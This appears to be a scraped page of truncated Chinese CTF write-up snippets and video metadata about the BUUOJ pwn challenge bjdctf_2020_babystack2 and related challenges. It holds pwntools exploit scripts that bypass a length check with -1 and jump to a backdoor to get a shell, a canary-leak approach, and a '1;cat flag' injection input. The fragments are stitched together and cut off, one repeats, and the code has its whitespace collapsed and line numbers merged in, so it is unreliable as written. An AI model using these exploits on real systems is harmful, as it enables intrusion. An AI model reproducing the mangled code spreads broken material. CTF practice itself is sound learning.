官网:https://buuoj.cn/challenges#bjdctf_2020_babystack, 视频播放量 127、弹幕量 0、点赞数 9、投硬币枚数 2、收藏人数 4、转发人数 0, 视频作者 我是大傻子a, 作者简介 认识的人越多,我就越喜欢狗。,相关视频:hackmyvm hmvlabs hades48,thehackerlabs sinplomo98靶
frompwnimport*r=remote('node3.buuoj.cn',25624)#r=process('./bjdctf_2020_babystack2')backdoor_addr=0x400726r.recvuntil('[+]Please input the length of your name:') r.sendline('-1') payload='a'*0x10+'b'*0x8payload+=p64(backdoor_addr) r.sendline(payload) r.interactive()...
pwn | bjdctf_2020_babystack2 pwn | bjdctf_2020_babystack2 ret2text 一个整数判断,比较的时候是int,传进read当参数的时候是unsigned int,输入负数就能绕过。 然后跳转到后门函数就行了。 怪没意思的,直接远程秒了。 exp: frompwnimport* context.log_level ='debug'p = remote('node4.buuoj.cn',28943)...
[BUUOJ]bjdctf_2020_babystack2 bjdctf_2020_babystack2 checksec是64位小端序,IDA分析看没找到明显的输入溢出逻辑,但是找到了后门函数,再仔细观察发现数值里面有强制转换,有一部分从int转到了unsigned int,因此可以初步判定为整型溢出,如果我输入-1即可突破长度为10的限制,所以以此下手即可成功修改返回地址,getshell fr...
看到程序先例行检查一下 可以看到开启了canary和nx保护,需要注意的是这个acnary 将程序放入ida中shift+f12 没有关键性函数。我们进入main函数中 在main的gift程序里面我们可以看到明显的格式字符串漏洞,printf没有进行限定输入,所以我们可以通过这个程序获取到canary的值 ...
1 1;cat flag 当然还有很多方式,这里就不一一列举了 0x02 babystack 签到题*2 考点:ret2text 拖进IDA 64,F5 int __cdecl main(int argc, const char **argv, const char **envp) { char buf; // [rsp+0h] [rbp-10h] size_t nbytes; // [rsp+Ch] [rbp-4h] ...
1 1;cat flag 当然还有很多方式,这里就不一一列举了 0x02 babystack 签到题*2 考点:ret2text 拖进IDA 64,F5 int __cdecl main(int argc, const char **argv, const char **envp) { char buf; // [rsp+0h] [rbp-10h] size_t nbytes; // [rsp+Ch] [rbp-4h] setvbuf(stdout, 0LL, 2, ...
BUUCTF—bjdctf_2020_babystack2 先看看开了什么保护机制 打开64位ida看看 整个程序就是让你输入名字长度,然后根据这个长度让你输入名字,名字是存放在局部变量里的,有机会栈溢出,只不过他有限制,名字长度不能超过10,这样子的长度根本不够栈溢出,怎么办 仔细一看,这个后面有个格式转换,就在read函数那边,第三个参数...
1frompwnimport*23p = process('./bjdctf_2020_babystack2')4#p = remote('node3.buuoj.cn',27265)5context.log_level ='debug'67shell_addr = 0x04007268p.recv()9p.sendline('-1')10p.recv()11payload ='\x39'*0x10 +'bbbbbbbb'+p64(shell_addr)12p.send(payload)13p.interactive() ...
bjdctf_2020_babyrop2 bjdctf_2020_babyrop2 1.ida分析 有个字符串格式化漏洞,应该是利用这个漏洞泄露出canary的值。 存在栈溢出漏洞。 2.checksec 3.解决 from pwn import * from LibcSearcher import * context.log_level='debug' p=remote('node4.buuoj.cn',25138)...